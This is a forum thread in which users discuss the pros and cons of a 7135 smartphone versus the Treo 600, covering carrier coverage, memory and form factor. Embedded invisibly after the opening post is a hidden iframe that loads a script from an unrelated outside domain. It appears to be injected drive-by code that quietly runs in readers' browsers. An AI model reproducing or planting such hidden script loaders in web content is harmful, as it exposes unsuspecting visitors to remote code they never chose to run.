+ Reply to Thread

Everybody Doesn't Like SOMETHING....!!

So a couple of guys at my office have the 7135, and are saying that I should get one.

What are your main reasons in favor of this device? And perhaps more importantly, what are the main reasons AGAINST this device?

Thanks!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

OK, I'll bite.

I have and LOVE my 7135. The only thing that would keep me from keeping it is a better Smartphone on the right provider. I need the coverage that only VZW offers **today** and I don't like Microsoft PDAs so the 7135 is the best alternative for me.

What I don't like about the 7135? It (like all Smartphones) is behind from a PDA technology standpoint. From a convergence standpoint, it is second only to the Treo 600.

If SPCS and/or AT&T was better my travels, the Treo 600 would be a better choice for me (even with its icky candybar form) since it provides 8MB more addressable RAM, OS5, and a faster processor. The camera is unimportant to me and I'd rather it wasn't there.

Newer and even better smartphones seem to be on the horizon so I'll stay put for a while and enjoy my 7135. By the time a better phone is released, SPCS and AT&T are bound to have improved.

Thanks for the thoughts!!

I love mine. It does seem that there have been some QA issues, especially with early models. Unfortunately that seems to be the norm for many of these "high end" smartphones. I have not had any issues.

It depends on your priorities.

Phone form: clam shell, brick etc
    Back up/extra storage: SD cards are WONDERFUL!
    Thumb-type keyboard vs stylus

Are yuo thinking of getting a smartphone and just trying to decide which one? Or are you looking for reasons to get one?

Love mine too
    Please visit my picture site: Robert-O-Rama :)

Actually, I've decided to give the Treo 600 a try.....!!

We'll see how it goes!